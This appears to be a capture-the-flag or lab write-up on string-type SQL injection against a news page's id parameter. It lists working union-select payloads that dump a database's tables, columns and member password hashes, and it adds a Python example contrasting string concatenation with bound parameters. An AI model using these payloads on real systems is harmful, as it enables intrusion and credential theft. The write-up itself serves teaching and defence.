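String-type injection: the approach is really no different from numeric injection; you just need to take care to close the single quote and add a comment after the payload.
id=tingjigonggao' order by 1 -- (test the number of columns; there turn out to be 4)
Tried blindly guessing table names (admin, manger); that failed.
So dump the database the straightforward way. First test which positions are echoed: id=tingjigongga' union select '1','2','3','4' --
/new_list.php?id=tingjigongga' union select '1',database(),'3','4' -- (dump the database name)
id=tingjigongga' union select '1',(select group_concat(table_name) from information_schema.tables where table_schema = 'mozhe_discuz_stormgroup' limit 0,1),'3','4' -- (dump the table names)
id=tingjigonggao1' union select '1',(select group_concat(column_name) from information_schema.columns where table_name='stormgroup_member'),'3','4' -- (dump the column names)
id=tingjigonggao1' union select '1',(select group_concat(name,0x7c,password,0x7e) from stormgroup_member),'3','4' --
(dump the column values)
Decrypting the MD5 online is all that is left.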
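Why the single quote and trailing comment matter, and what removes the problem, shown as an added example that is not part of the original write-up. It assumes an in-memory SQLite table named notice standing in for the lab's MySQL table; the table, its columns and the function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the page's four-column news table; not the lab's real schema.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE notice (id TEXT, title TEXT, body TEXT, created TEXT)")
    db.execute("INSERT INTO notice VALUES "
               "('tingjigonggao', 'Maintenance notice', 'body text', '2020-01-01')")
    return db

def lookup_concat(db, notice_id):
    # Vulnerable pattern: the value is pasted between quotes, so a quote in the
    # input ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT id, title, body, created FROM notice "
           "WHERE id = '" + notice_id + "'")
    return db.execute(sql).fetchall()

def lookup_bound(db, notice_id):
    # Hardened form: the value is bound as a parameter and is only ever data.
    sql = "SELECT id, title, body, created FROM notice WHERE id = ?"
    return db.execute(sql, (notice_id,)).fetchall()

# The echo-position probe from the write-up, used unchanged as test input.
PROBE = "tingjigongga' union select '1','2','3','4' -- "

if __name__ == "__main__":
    db = make_db()
    print("concat, normal id:", lookup_concat(db, "tingjigonggao"))
    print("concat, probe    :", lookup_concat(db, PROBE))
    print("bound,  probe    :", lookup_bound(db, PROBE))
```

With concatenation the probe returns the injected row; with the bound parameter the same string matches no id and returns nothing.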